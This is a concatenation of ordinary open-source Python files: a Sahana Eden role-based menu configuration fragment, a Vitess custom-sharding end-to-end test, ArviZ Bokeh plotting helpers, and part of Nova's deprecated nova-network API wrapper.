current.auth has_role = auth.s3_has_role if has_role("ADMIN"): if current.request.function == "forum": return self.admin() return M(c="pr")( M("Persons", f="person")( M("Create", m="create"), ), #M("Groups", f="group")( # M("Create", m="create"), #), #M("Forums", f="forum")( # M("Create", m="create"), #), ) elif has_role("ORG_ADMIN"): return M()(M("Users", c="admin", f="user")( ), M("Forums", c="pr", f="forum")( M("Create", m="create"), ), M("Request Approvers", c="inv", f="req_approver")( ), ) else: # Managers (HR or Training Center Coordinators) return M()(M("Forums", c="pr", f="forum")( M("Create", m="create"), ), ) # ------------------------------------------------------------------------- @staticmethod def hrm(): """ HRM Human Talent """ request = current.request if "profile" in request.get_vars: # No Side Menu return None auth = current.auth has_role = auth.s3_has_role s3 = current.session.s3 len_roles = len(s3.roles) if (len_roles <= 2) or \ (len_roles == 3 and has_role("RIT_MEMBER") and not has_role("ADMIN")): # No Side Menu return None #ADMIN = s3.system_roles.ADMIN ORG_ADMIN = s3.system_roles.ORG_ADMIN # training_functions imported from layouts if request.function in training_functions: return M()( M("Training Centers", c="hrm", f="training_center")( ), M("Training Course Catalog", c="hrm", f="course")( M("Create", m="create"), M("Import", m="import", p="create", restrict=(ORG_ADMIN, "ns_training_manager", "training_coordinator", )), #M("Certificates", f="certificate"), # Just access this via Tabs of Courses & Certificates #M("Course Certificates", f="course_certificate"), ), M("Training Events", c="hrm", f="training_event")( M("Create", m="create"), M("Search Training Participants", f="training"), M("Import Participant List", f="training", m="import", restrict=(ORG_ADMIN, "ns_training_manager", "training_coordinator", "training_assistant", )), ), M("External Trainees", c="hrm", f="trainee")( M("Create", m="create"), ), M("Report", c="hrm", f="training", 
m="report")( ), ) else: return M()( M("Human Talent", c="hrm", f="human_resource", m="summary")( M("Create", m="create"), M("Import", f="person", m="import", restrict=(ORG_ADMIN, "hr_manager", )), ), M("Report", c="hrm", f="human_resource", m="report")( #M("Staff Report", m="report"), #M("Expiring Staff Contracts Report", # vars={"expiring": "1"}), #M("Hours by Role Report", f="programme_hours", m="report", # vars=Storage(rows="job_title_id", # cols="month", # fact="sum(hours)"), # ), M("Hours by Program Report", f="programme_hours", m="report", vars=Storage(rows="programme_id", cols="month", fact="sum(hours)"), ), ), #M("Teams", c="hrm", f="group")( # M("Create", m="create"), # M("Search Members", f="group_membership"), # M("Import", f="group_membership", m="import"), #), M("National Societies", c="org", f="organisation", vars=RC)( M("Create", m="create", vars=RC ), M("Import", m="import", p="create", restrict=[ORG_ADMIN]) ), #M("Offices", c="org", f="office")( # M("Create", m="create"), # M("Import", m="import", p="create"), #), #M("Department Catalog", c="hrm", f="department")( # M("Create", m="create"), #), M("Position Catalog", c="hrm", f="job_title")( M("Create", m="create"), M("Import", m="import", p="create", restrict=(ORG_ADMIN, "hr_manager", )), ), M("Programs", c="hrm", f="programme")( M("Create", m="create"), M("Import Hours", f="programme_hours", m="import"), ), #M("Organization Types", c="org", f="organisation_type", # restrict=[ADMIN])( # M("Create", m="create"), #), #M("Office Types", c="org", f="office_type", # restrict=[ADMIN])( # M("Create", m="create"), #), #M("Facility Types", c="org", f="facility_type", # restrict=[ADMIN])( # M("Create", m="create"), #), #M("Personal Profile", c="hrm", f="person", # vars={"access": "personal"}) ) # ------------------------------------------------------------------------- @staticmethod def member(): """ Membership Management """ return M(c="member")( M("Partners", f="membership", m="summary")( M("Create", 
m="create"), #M("Report", m="report"), M("Import", f="person", m="import"), ), M("Partner Types", f="membership_type")( M("Create", m="create"), #M("Import", m="import"), ), ) # ------------------------------------------------------------------------- def org(self): """ Organisation Management """ # Same as HRM return self.hrm() # ------------------------------------------------------------------------- @staticmethod def inv(): """ INV / Inventory """ if current.request.function == "req_approver": # Accessed via Settings has_role = current.auth.s3_has_role if has_role("ADMIN"): return self.admin() elif has_role("ORG_ADMIN"): return self.pr() else: return None if current.auth.s3_has_roles(("ORG_ADMIN", "wh_operator", "logs_manager", )): return M(c="inv")( M("Stock Management",link=False)( M("Stock Adjustments", f="adj"), M("Kitting", f="kitting"), #M("Receive a new shipment", f="recv", m="create"), M("Receive a new shipment", f="recv", vars = {"incoming": 1}), M("Send a new shipment", f="send", m="create"), ), M("Purchases", f="order_item", restrict=["ORG_ADMIN", "logs_manager"]), M("Requests", f="req")( #M("My Requests", # vars = {"mine": 1}, # ), ), M("Import Inventory", f="inv_item", m="import", restrict=["ADMIN"]), M("Parameters", link=False, restrict=["ORG_ADMIN", "logs_manager"])( M("Warehouses", f="warehouse"), M("Projects", f="project"), M("Catalogs", c="supply", f="catalog"), M("Item Categories", c="supply", f="item_category"), M("Items", c="supply", f="item"), M("Donors", f="donor"), M("Suppliers", f="supplier"), M("Facilities", f="facility"), M("Packages", f="package"), M("Stock limit", f="minimum"), ), M("Reports", link=False)( M("Inventory", f="inv_item", m="summary"), M("Stock Movements", f="inv_item", m="grouped", vars = {"report": "movements"}, ), M("Stock Organisation", f="inv_item", m="grouped", vars = {"report": "default"}, ), ), ) else: # Normal users see their own Requests & Inventory Reports return M(c="inv")( M("My Requests", f="req", vars = 
{"mine": 1})( ), M("Reports", link=False)( M("Inventory", f="inv_item", m="summary"), ), ) # ------------------------------------------------------------------------- #def proc(self): # """ Procurements """ # Same as Inventory # return self.inv() # ------------------------------------------------------------------------- @staticmethod def project(): """ PROJECT / Project Tracking & Management """ #root_org = current.auth.root_org_name() #def community_volunteers(i): # if root_org == "Honduran Red Cross": # return True # else: # return False system_roles = current.session.s3.system_roles ORG_ADMIN = system_roles.ORG_ADMIN menu = M(c="project")( M("Programs", f="programme")( M("Create", m="create"), ), M("Projects", f="project", m="summary")( M("Create", m="create"), ), M("Locations", f="location")( # Better created from tab (otherwise Activity Type filter won't work) #M("Create", m="create"), M("Map", m="map"), M("Community Contacts", f="location_contact"), #M("Community Volunteers", f="volunteer", # check=community_volunteers), ), M("Reports", f="location", m="report")( M("3W", f="location", m="report"), M("Beneficiaries", f="beneficiary", m="report"), #M("Indicators", f="indicator", m="report", # check=indicators, # ), #M("Indicators over Time", f="indicator", m="timeplot", # check=indicators, # ), M("Funding", f="organisation", m="report"), M("Global Report of Projects Status", f="project", m="grouped"), ), M("Import", f="project", m="import", p="create", restrict=[ORG_ADMIN])( M("Import Projects", m="import", p="create"), M("Import Project Organizations", f="organisation", m="import", p="create"), M("Import Project Communities", f="location", m="import", p="create"), ), M("National Societies", c="org", f="organisation", vars=RC)( #M("Create", m="create", restrict=[ADMIN]), #M("Import", m="import", p="create", restrict=[ADMIN]), ), M("Partner Organizations", f="partners")( M("Create", m="create", restrict=[ORG_ADMIN]), M("Import", m="import", p="create", 
restrict=[ORG_ADMIN]), ), #M("Activity Types", f="activity_type")( # M("Create", m="create"), #), M("Beneficiary Types", f="beneficiary_type")( M("Create", m="create"), ), #M("Demographics", f="demographic")( # M("Create", m="create"), #), M("Hazards", f="hazard")( M("Create", m="create"), ), #M("Indicators", f="indicator", # check=indicators)( # M("Create", m="create"), #), M("Sectors", f="sector")( M("Create", m="create"), ), M("Themes", f="theme")( M("Create", m="create"), ), M("Period of Time", f="window")() ) return menu # ------------------------------------------------------------------------- @staticmethod def deploy(): """ RIT Alerting and Deployments """ return M()(M("Missions", c="deploy", f="mission", m="summary")( M("Create", m="create"), M("Active Missions", m="summary", vars={"~.status__belongs": "2"}), ), M("Alerts", c="deploy", f="alert")( M("Create", m="create"), #M("InBox", # c="deploy", f="email_inbox", #), M("Twitter Settings", #c="deploy", f="email_channel", #p="update", t="msg_email_channel", c="deploy", f="twitter_channel", p="update", t="msg_twitter_channel", ), ), M("Deployments", c="deploy", f="assignment", m="summary" ), #M("Sectors", # c="deploy", f="job_title", restrict=["ADMIN"], #), M("Disaster Types", c="event", f="event_type", restrict=["ADMIN"], ), M("RIT Members", c="deploy", f="human_resource", m="summary")( M("Add Member", c="deploy", f="application", m="select", p="create", t="deploy_application", ), M("Import Members", c="deploy", f="person", m="import"), ), M("Online Manual", c="deploy", f="index"), ) # END =========================================================================
#!/usr/bin/env python
#
# Copyright 2015, Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can
# be found in the LICENSE file.

# End-to-end test of a *custom* sharded Vitess keyspace: shards are created
# and addressed explicitly by name ('0', '1') rather than by keyspace-id
# ranges.  NOTE(review): this is Python 2 code (xrange, dict.iteritems).

import base64
import unittest

from vtproto import topodata_pb2

from vtdb import vtgate_client

import environment
import tablet
import utils

# shards
shard_0_master = tablet.Tablet()
shard_0_rdonly = tablet.Tablet()
shard_1_master = tablet.Tablet()
shard_1_rdonly = tablet.Tablet()


def setUpModule():
  # Bring up topo server, MySQL instances, vtctld and vtgate once for the
  # whole module.  On any failure, tear everything down before re-raising
  # so processes don't leak.
  try:
    environment.topo_server().setup()
    setup_procs = [
        shard_0_master.init_mysql(),
        shard_0_rdonly.init_mysql(),
        shard_1_master.init_mysql(),
        shard_1_rdonly.init_mysql(),
    ]
    utils.Vtctld().start()
    utils.VtGate().start()
    utils.wait_procs(setup_procs)
  except:
    tearDownModule()
    raise


def tearDownModule():
  # Mirror image of setUpModule: stop MySQL, topo server, stray
  # subprocesses, and remove on-disk state.
  if utils.options.skip_teardown:
    return

  teardown_procs = [
      shard_0_master.teardown_mysql(),
      shard_0_rdonly.teardown_mysql(),
      shard_1_master.teardown_mysql(),
      shard_1_rdonly.teardown_mysql(),
  ]
  utils.wait_procs(teardown_procs, raise_on_error=False)

  environment.topo_server().teardown()
  utils.kill_sub_processes()
  utils.remove_tmp_files()

  shard_0_master.remove_tree()
  shard_0_rdonly.remove_tree()
  shard_1_master.remove_tree()
  shard_1_rdonly.remove_tree()


class TestCustomSharding(unittest.TestCase):
  """Test a custom-shared keyspace."""

  def _vtdb_conn(self):
    """Open a vtgate client connection (30s timeout)."""
    protocol, addr = utils.vtgate.rpc_endpoint(python=True)
    return vtgate_client.connect(protocol, addr, 30.0)

  def _insert_data(self, shard, start, count, table='data'):
    """Insert `count` rows with ids [start, start+count) into one shard.

    Each row is written in its own begin/commit transaction.
    """
    sql = 'insert into ' + table + '(id, name) values (%(id)s, %(name)s)'
    conn = self._vtdb_conn()
    cursor = conn.cursor(
        tablet_type='master', keyspace='test_keyspace',
        shards=[shard],
        writable=True)
    for x in xrange(count):
      bindvars = {
          'id': start+x,
          'name': 'row %d' % (start+x),
      }
      conn.begin()
      cursor.execute(sql, bindvars)
      conn.commit()
    conn.close()

  def _check_data(self, shard, start, count, table='data'):
    """Verify the rows written by _insert_data exist on the given shard."""
    sql = 'select name from ' + table + ' where id=%(id)s'
    conn = self._vtdb_conn()
    cursor = conn.cursor(
        tablet_type='master', keyspace='test_keyspace',
        shards=[shard])
    for x in xrange(count):
      bindvars = {
          'id': start+x,
      }
      cursor.execute(sql, bindvars)
      qr = cursor.fetchall()
      self.assertEqual(len(qr), 1)
      v = qr[0][0]
      self.assertEqual(v, 'row %d' % (start+x))
    conn.close()

  def test_custom_end_to_end(self):
    """Runs through the common operations of a custom sharded keyspace.

    Tests creation with one shard, schema change, reading / writing
    data, adding one more shard, reading / writing data from both
    shards, applying schema changes again, and reading / writing data
    from both shards again.
    """

    utils.run_vtctl(['CreateKeyspace', 'test_keyspace'])

    # start the first shard only for now
    shard_0_master.init_tablet('master', 'test_keyspace', '0')
    shard_0_rdonly.init_tablet('rdonly', 'test_keyspace', '0')
    for t in [shard_0_master, shard_0_rdonly]:
      t.create_db('vt_test_keyspace')
      t.start_vttablet(wait_for_state=None)
    for t in [shard_0_master, shard_0_rdonly]:
      t.wait_for_vttablet_state('SERVING')
    utils.run_vtctl(['InitShardMaster', 'test_keyspace/0',
                     shard_0_master.tablet_alias], auto_log=True)
    utils.run_vtctl(['RebuildKeyspaceGraph', 'test_keyspace'], auto_log=True)

    # one shard, and all three tablet types, should be serving
    self._check_shards_count_in_srv_keyspace(1)
    s = utils.run_vtctl_json(['GetShard', 'test_keyspace/0'])
    self.assertEqual(len(s['served_types']), 3)

    # create a table on shard 0
    sql = '''create table data( id bigint auto_increment, name varchar(64), primary key (id) ) Engine=InnoDB'''
    utils.run_vtctl(['ApplySchema', '-sql=' + sql, 'test_keyspace'],
                    auto_log=True)

    # reload schema everywhere so the QueryService knows about the tables
    for t in [shard_0_master, shard_0_rdonly]:
      utils.run_vtctl(['ReloadSchema', t.tablet_alias], auto_log=True)

    # insert data on shard 0
    self._insert_data('0', 100, 10)

    # re-read shard 0 data
    self._check_data('0', 100, 10)

    # create shard 1
    shard_1_master.init_tablet('master', 'test_keyspace', '1')
    shard_1_rdonly.init_tablet('rdonly', 'test_keyspace', '1')
    for t in [shard_1_master, shard_1_rdonly]:
      t.start_vttablet(wait_for_state=None)
    for t in [shard_1_master, shard_1_rdonly]:
      # NOT_SERVING until the shard gets a master and a schema
      t.wait_for_vttablet_state('NOT_SERVING')
    s = utils.run_vtctl_json(['GetShard', 'test_keyspace/1'])
    self.assertEqual(len(s['served_types']), 3)
    utils.run_vtctl(['InitShardMaster', 'test_keyspace/1',
                     shard_1_master.tablet_alias], auto_log=True)
    utils.run_vtctl(['CopySchemaShard', shard_0_rdonly.tablet_alias,
                     'test_keyspace/1'], auto_log=True)
    for t in [shard_1_master, shard_1_rdonly]:
      utils.run_vtctl(['RefreshState', t.tablet_alias], auto_log=True)
      t.wait_for_vttablet_state('SERVING')

    # rebuild the keyspace serving graph now that the new shard was added
    utils.run_vtctl(['RebuildKeyspaceGraph', 'test_keyspace'], auto_log=True)

    # insert data on shard 1
    self._insert_data('1', 200, 10)

    # re-read shard 1 data
    self._check_data('1', 200, 10)

    # create a second table on all shards
    sql = '''create table data2( id bigint auto_increment, name varchar(64), primary key (id) ) Engine=InnoDB'''
    utils.run_vtctl(['ApplySchema', '-sql=' + sql, 'test_keyspace'],
                    auto_log=True)

    # reload schema everywhere so the QueryService knows about the tables
    for t in [shard_0_master, shard_0_rdonly, shard_1_master, shard_1_rdonly]:
      utils.run_vtctl(['ReloadSchema', t.tablet_alias], auto_log=True)

    # insert and read data on all shards
    self._insert_data('0', 300, 10, table='data2')
    self._insert_data('1', 400, 10, table='data2')
    self._check_data('0', 300, 10, table='data2')
    self._check_data('1', 400, 10, table='data2')

    utils.run_vtctl(['RebuildKeyspaceGraph', 'test_keyspace'], auto_log=True)
    self._check_shards_count_in_srv_keyspace(2)

    # Now test SplitQuery API works (used in MapReduce usually, but bringing
    # up a full MR-capable cluster is too much for this test environment)
    sql = 'select id, name from data'
    s = utils.vtgate.split_query(sql, 'test_keyspace', 4)
    self.assertEqual(len(s), 4)
    # with 2 shards and 4 splits, each shard should get exactly 2 splits
    shard0count = 0
    shard1count = 0
    for q in s:
      if q['shard_part']['shards'][0] == '0':
        shard0count += 1
      if q['shard_part']['shards'][0] == '1':
        shard1count += 1
    self.assertEqual(shard0count, 2)
    self.assertEqual(shard1count, 2)

    # run the queries, aggregate the results, make sure we have all rows
    rows = {}
    for q in s:
      bindvars = {}
      for name, value in q['query']['bind_variables'].iteritems():
        # vtctl encodes bytes as base64.
        bindvars[name] = int(base64.standard_b64decode(value['value']))
      qr = utils.vtgate.execute_shards(
          q['query']['sql'],
          'test_keyspace', ','.join(q['shard_part']['shards']),
          tablet_type='master', bindvars=bindvars)
      for r in qr['Rows']:
        rows[int(r[0])] = r[1]
    self.assertEqual(len(rows), 20)
    expected = {}
    for i in xrange(10):
      expected[100 + i] = 'row %d' % (100 + i)
      expected[200 + i] = 'row %d' % (200 + i)
    self.assertEqual(rows, expected)

    self._test_vtclient_execute_shards_fallback()

  def _check_shards_count_in_srv_keyspace(self, shard_count):
    """Assert MASTER and RDONLY partitions each reference `shard_count` shards."""
    ks = utils.run_vtctl_json(['GetSrvKeyspace', 'test_nj', 'test_keyspace'])
    check_types = set([topodata_pb2.MASTER, topodata_pb2.RDONLY])
    for p in ks['partitions']:
      if p['served_type'] in check_types:
        self.assertEqual(len(p['shard_references']), shard_count)
        check_types.remove(p['served_type'])

    self.assertEqual(len(check_types), 0,
                     'The number of expected shard_references in GetSrvKeyspace'
                     ' was not equal %d for all expected tablet types.'
                     % shard_count)

  def _test_vtclient_execute_shards_fallback(self):
    """Test per-shard mode of Go SQL driver (through vtclient)."""
    for shard in [0, 1]:
      id_val = (shard + 1) * 1000  # example: 1000, 2000
      name_val = 'row %d' % id_val

      # write
      utils.vtgate.vtclient('insert into data(id, name) values (:v1, :v2)',
                            bindvars=[id_val, name_val],
                            keyspace='test_keyspace', shard=str(shard))

      want = ['Index\tid\tname', '0\t%d\t%s' % (id_val, name_val)]
      # read non-streaming
      out, _ = utils.vtgate.vtclient(
          'select * from data where id = :v1', bindvars=[id_val],
          keyspace='test_keyspace', shard=str(shard))
      self.assertEqual(out, want)
      # read streaming
      out, _ = utils.vtgate.vtclient(
          'select * from data where id = :v1', bindvars=[id_val],
          keyspace='test_keyspace', shard=str(shard), streaming=True)
      self.assertEqual(out, want)


if __name__ == '__main__':
  utils.main()
# pylint: disable=no-member,invalid-name,redefined-outer-name
"""ArviZ plotting backends."""
import re

import numpy as np
from pandas import DataFrame

from ...rcparams import rcParams

__all__ = [
    "to_cds",
    "output_notebook",
    "output_file",
    "ColumnDataSource",
    "create_layout",
    "show_layout",
]


def to_cds(
    data,
    var_names=None,
    groups=None,
    dimensions=None,
    group_info=True,
    var_name_format=None,
    index_origin=None,
):
    """Transform data to ColumnDataSource (CDS) compatible with Bokeh.

    Uses `_ARVIZ_GROUP_` and `_ARVIZ_CDS_SELECTION_` to separate var_name
    from group and dimensions in CDS columns.

    Parameters
    ----------
    data : obj
        Any object that can be converted to an az.InferenceData object
        Refer to documentation of az.convert_to_inference_data for details
    var_names : str or list of str, optional
        Variables to be processed, if None all variables are processed.
    groups : str or list of str, optional
        Select groups for CDS. Default groups are
        {"posterior_groups", "prior_groups", "posterior_groups_warmup"}
            - posterior_groups: posterior, posterior_predictive, sample_stats
            - prior_groups: prior, prior_predictive, sample_stats_prior
            - posterior_groups_warmup: warmup_posterior, warmup_posterior_predictive,
              warmup_sample_stats
    ignore_groups : str or list of str, optional
        Ignore specific groups from CDS.
    dimension : str, or list of str, optional
        Select dimensions along to slice the data. By default uses ("chain", "draw").
    group_info : bool
        Add group info for `var_name_format`
    var_name_format : str or tuple of tuple of string, optional
        Select column name format for non-scalar input.
        Predefined options are {"brackets", "underscore", "cds"}
            "brackets":
                - add_group_info == False: ``theta[0,0]``
                - add_group_info == True: ``theta_posterior[0,0]``
            "underscore":
                - add_group_info == False: ``theta_0_0``
                - add_group_info == True: ``theta_posterior_0_0_``
            "cds":
                - add_group_info == False: ``theta_ARVIZ_CDS_SELECTION_0_0``
                - add_group_info == True: ``theta_ARVIZ_GROUP_posterior__ARVIZ_CDS_SELECTION_0_0``
            tuple:
                Structure:
                    - tuple: (dim_info, group_info)
                    - dim_info: (str: `.join` separator,
                      str: dim_separator_start, str: dim_separator_end)
                    - group_info: (str: group separator start, str: group separator end)
                Example: ((",", "[", "]"), ("_", ""))
                    - add_group_info == False: ``theta[0,0]``
                    - add_group_info == True: ``theta_posterior[0,0]``
    index_origin : int, optional
        Start parameter indices from `index_origin`. Either 0 or 1.

    Returns
    -------
    bokeh.models.ColumnDataSource object
    """
    from ...utils import flatten_inference_data_to_dict

    if var_name_format is None:
        var_name_format = "cds"

    cds_dict = flatten_inference_data_to_dict(
        data=data,
        var_names=var_names,
        groups=groups,
        dimensions=dimensions,
        group_info=group_info,
        index_origin=index_origin,
        var_name_format=var_name_format,
    )
    cds_data = ColumnDataSource(DataFrame.from_dict(cds_dict, orient="columns"))
    return cds_data


def output_notebook(*args, **kwargs):
    """Wrap :func:`bokeh.plotting.output_notebook`."""
    import bokeh.plotting as bkp

    return bkp.output_notebook(*args, **kwargs)


def output_file(*args, **kwargs):
    """Wrap :func:`bokeh.plotting.output_file`."""
    import bokeh.plotting as bkp

    return bkp.output_file(*args, **kwargs)


def ColumnDataSource(*args, **kwargs):
    """Wrap bokeh.models.ColumnDataSource."""
    from bokeh.models import ColumnDataSource

    return ColumnDataSource(*args, **kwargs)


def create_layout(ax, force_layout=False):
    """Transform bokeh array of figures to layout.

    Parameters
    ----------
    ax : bokeh figure or array-like of bokeh figures
        Figures to arrange; ``None`` entries are treated as empty slots.
    force_layout : bool
        When True, always use a ``gridplot`` layout and ignore
        ``rcParams["plot.bokeh.layout.order"]``.

    Returns
    -------
    A bokeh layout object containing the figures.
    """
    ax = np.atleast_2d(ax)
    subplot_order = rcParams["plot.bokeh.layout.order"]
    if force_layout:
        from bokeh.layouts import gridplot as layout

        ax = ax.tolist()
        layout_args = {
            "sizing_mode": rcParams["plot.bokeh.layout.sizing_mode"],
            "toolbar_location": rcParams["plot.bokeh.layout.toolbar_location"],
        }
    elif any(item in subplot_order for item in ("row", "column")):
        # check number of rows (order strings look like "row", "2column", ...)
        match = re.match(r"(\d*)(row|column)", subplot_order)
        # BUG FIX: for an order without a digit prefix (e.g. "row"),
        # ``match.group(1)`` is the empty string -- not None -- so the old
        # ``int(match.group(1)) if match.group(1) is not None else 1`` raised
        # ValueError on ``int("")``. Test truthiness instead.
        n = int(match.group(1)) if match.group(1) else 1
        subplot_order = match.group(2)
        # set up 1D list of axes
        ax = [item for item in ax.ravel().tolist() if item is not None]
        layout_args = {"sizing_mode": rcParams["plot.bokeh.layout.sizing_mode"]}
        if subplot_order == "row" and n == 1:
            from bokeh.layouts import row as layout
        elif subplot_order == "column" and n == 1:
            from bokeh.layouts import column as layout
        else:
            from bokeh.layouts import layout
        if n != 1:
            # BUG FIX: pad with None up to the next multiple of ``n`` so the
            # reshape below is always valid. The old padding count
            # ``ceil(len(ax) / n) - len(ax)`` was <= 0 for any non-trivial
            # input, leaving the list unpadded and the reshape prone to fail.
            pad = n * int(np.ceil(len(ax) / n)) - len(ax)
            ax = np.array(ax + [None for _ in range(pad)])
            if subplot_order == "row":
                ax = ax.reshape(n, -1)
            else:
                ax = ax.reshape(-1, n)
            ax = ax.tolist()
    else:
        if subplot_order in ("square", "square_trimmed"):
            ax = [item for item in ax.ravel().tolist() if item is not None]
            n = int(np.ceil(len(ax) ** 0.5))
            ax = ax + [None for _ in range(n ** 2 - len(ax))]
            ax = np.array(ax).reshape(n, n)
        ax = ax.tolist()
        if (subplot_order == "square_trimmed") and any(
            all(item is None for item in row) for row in ax
        ):
            # drop rows that are entirely empty
            from bokeh.layouts import layout

            ax = [row for row in ax if not all(item is None for item in row)]
            layout_args = {"sizing_mode": rcParams["plot.bokeh.layout.sizing_mode"]}
        else:
            from bokeh.layouts import gridplot as layout

            layout_args = {
                "sizing_mode": rcParams["plot.bokeh.layout.sizing_mode"],
                "toolbar_location": rcParams["plot.bokeh.layout.toolbar_location"],
            }
    # ignore "fixed" sizing_mode without explicit width and height
    if layout_args.get("sizing_mode", "") == "fixed":
        layout_args.pop("sizing_mode")
    return layout(ax, **layout_args)


def show_layout(ax, show=True, force_layout=False):
    """Create a layout and call bokeh show."""
    if show is None:
        show = rcParams["plot.bokeh.show"]
    if show:
        import bokeh.plotting as bkp

        layout = create_layout(ax, force_layout=force_layout)
        bkp.show(layout)


def _copy_docstring(lib, function):
    """Extract docstring from function."""
    import importlib

    try:
        module = importlib.import_module(lib)
        func = getattr(module, function)
        doc = func.__doc__
    # ROBUSTNESS FIX: getattr raises AttributeError (not ImportError) when the
    # module imports fine but lacks the requested attribute; fall back to the
    # same placeholder message in both cases.
    except (ImportError, AttributeError):
        doc = f"Failed to import function {function} from {lib}"

    if not isinstance(doc, str):
        doc = ""
    return doc


# TODO: try copying substitutions too, or autoreplace them ourselves
output_notebook.__doc__ += "\n\n" + _copy_docstring("bokeh.plotting", "output_notebook")
output_file.__doc__ += "\n\n" + _copy_docstring("bokeh.plotting", "output_file")
ColumnDataSource.__doc__ += "\n\n" + _copy_docstring("bokeh.models", "ColumnDataSource")
# vim: tabstop=4 shiftwidth=4 softtabstop=4

# Copyright (c) 2011 X.commerce, a business unit of eBay Inc.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

"""
This version of the api is deprecated in Grizzly and will be removed.

It is provided just in case a third party manager is in use.
"""

from nova.db import base
from nova import exception
from nova.network import api as shiny_api
from nova.network import model as network_model
from nova.network import rpcapi as network_rpcapi
from nova.openstack.common import log as logging


LOG = logging.getLogger(__name__)

# Re-export the caching/policy decorators from the current ("shiny") network
# API so this deprecated module stays behaviorally in sync with it.
refresh_cache = shiny_api.refresh_cache
_update_instance_cache = shiny_api.update_instance_cache_with_nw_info
update_instance_cache_with_nw_info = _update_instance_cache
wrap_check_policy = shiny_api.wrap_check_policy


class API(base.Base):
    """API for doing networking via the nova-network network manager.

    This is a pluggable module - other implementations do networking via
    other services (such as Quantum).

    Nearly every public method is a thin, policy-checked forwarder to the
    corresponding RPC in ``network_rpcapi.NetworkAPI``.
    """

    # Sentinel distinguishing "argument not supplied" from an explicit None
    # in associate() below.
    _sentinel = object()

    def __init__(self, **kwargs):
        self.network_rpcapi = network_rpcapi.NetworkAPI()
        super(API, self).__init__(**kwargs)

    @wrap_check_policy
    def get_all(self, context):
        # Forward to the network manager; returns all networks.
        return self.network_rpcapi.get_all_networks(context)

    @wrap_check_policy
    def get(self, context, network_uuid):
        return self.network_rpcapi.get_network(context, network_uuid)

    @wrap_check_policy
    def create(self, context, **kwargs):
        return self.network_rpcapi.create_networks(context, **kwargs)

    @wrap_check_policy
    def delete(self, context, network_uuid):
        return self.network_rpcapi.delete_network(context, network_uuid, None)

    @wrap_check_policy
    def disassociate(self, context, network_uuid):
        return self.network_rpcapi.disassociate_network(context, network_uuid)

    @wrap_check_policy
    def get_fixed_ip(self, context, id):
        return self.network_rpcapi.get_fixed_ip(context, id)

    @wrap_check_policy
    def get_fixed_ip_by_address(self, context, address):
        return self.network_rpcapi.get_fixed_ip_by_address(context, address)

    @wrap_check_policy
    def get_floating_ip(self, context, id):
        return self.network_rpcapi.get_floating_ip(context, id)

    @wrap_check_policy
    def get_floating_ip_pools(self, context):
        return self.network_rpcapi.get_floating_ip_pools(context)

    @wrap_check_policy
    def get_floating_ip_by_address(self, context, address):
        return self.network_rpcapi.get_floating_ip_by_address(context,
                                                              address)

    @wrap_check_policy
    def get_floating_ips_by_project(self, context):
        return self.network_rpcapi.get_floating_ips_by_project(context)

    @wrap_check_policy
    def get_floating_ips_by_fixed_address(self, context, fixed_address):
        args = (context, fixed_address)
        return self.network_rpcapi.get_floating_ips_by_fixed_address(*args)

    @wrap_check_policy
    def get_backdoor_port(self, context, host):
        return self.network_rpcapi.get_backdoor_port(context, host)

    @wrap_check_policy
    def get_instance_id_by_floating_address(self, context, address):
        # NOTE(tr3buchet): i hate this
        return self.network_rpcapi.get_instance_id_by_floating_address(
            context, address)

    @wrap_check_policy
    def get_vifs_by_instance(self, context, instance):
        return self.network_rpcapi.get_vifs_by_instance(context,
                                                        instance['id'])

    @wrap_check_policy
    def get_vif_by_mac_address(self, context, mac_address):
        return self.network_rpcapi.get_vif_by_mac_address(context,
                                                          mac_address)

    @wrap_check_policy
    def allocate_floating_ip(self, context, pool=None):
        """Adds (allocates) a floating ip to a project from a pool."""
        # NOTE(vish): We don't know which network host should get the ip
        #             when we allocate, so just send it to any one.  This
        #             will probably need to move into a network supervisor
        #             at some point.
        return self.network_rpcapi.allocate_floating_ip(context,
                                                        context.project_id,
                                                        pool, False)

    @wrap_check_policy
    def release_floating_ip(self, context, address,
                            affect_auto_assigned=False):
        """Removes (deallocates) a floating ip with address from a project."""
        args = (context, address, affect_auto_assigned)
        return self.network_rpcapi.deallocate_floating_ip(*args)

    @wrap_check_policy
    @refresh_cache
    def associate_floating_ip(self, context, instance,
                              floating_address, fixed_address,
                              affect_auto_assigned=False):
        """Associates a floating ip with a fixed ip.

        ensures floating ip is allocated to the project in context
        """
        args = (context, floating_address, fixed_address,
                affect_auto_assigned)
        # The RPC returns the uuid of an instance the floating IP was
        # previously attached to (if any), so its cached network info can
        # be refreshed below.
        orig_instance_uuid = self.network_rpcapi.associate_floating_ip(*args)

        if orig_instance_uuid:
            msg_dict = dict(address=floating_address,
                            instance_id=orig_instance_uuid)
            LOG.info(_('re-assign floating IP %(address)s from '
                       'instance %(instance_id)s') % msg_dict)
            orig_instance = self.db.instance_get_by_uuid(context,
                                                         orig_instance_uuid)

            # purge cached nw info for the original instance
            update_instance_cache_with_nw_info(self, context, orig_instance)

    @wrap_check_policy
    @refresh_cache
    def disassociate_floating_ip(self, context, instance, address,
                                 affect_auto_assigned=False):
        """Disassociates a floating ip from fixed ip it is associated with."""
        self.network_rpcapi.disassociate_floating_ip(context, address,
                                                     affect_auto_assigned)

    @wrap_check_policy
    @refresh_cache
    def allocate_for_instance(self, context, instance, vpn,
                              requested_networks, macs=None,
                              conductor_api=None, security_groups=None,
                              **kwargs):
        """Allocates all network structures for an instance.

        TODO(someone): document the rest of these parameters.

        :param macs: None or a set of MAC addresses that the instance
            should use. macs is supplied by the hypervisor driver (contrast
            with requested_networks which is user supplied).
            NB: macs is ignored by nova-network.
        :returns: network info as from get_instance_nw_info() below
        """
        args = {}
        args['vpn'] = vpn
        args['requested_networks'] = requested_networks
        args['instance_id'] = instance['uuid']
        args['project_id'] = instance['project_id']
        args['host'] = instance['host']
        args['rxtx_factor'] = instance['instance_type']['rxtx_factor']
        nw_info = self.network_rpcapi.allocate_for_instance(context, **args)

        return network_model.NetworkInfo.hydrate(nw_info)

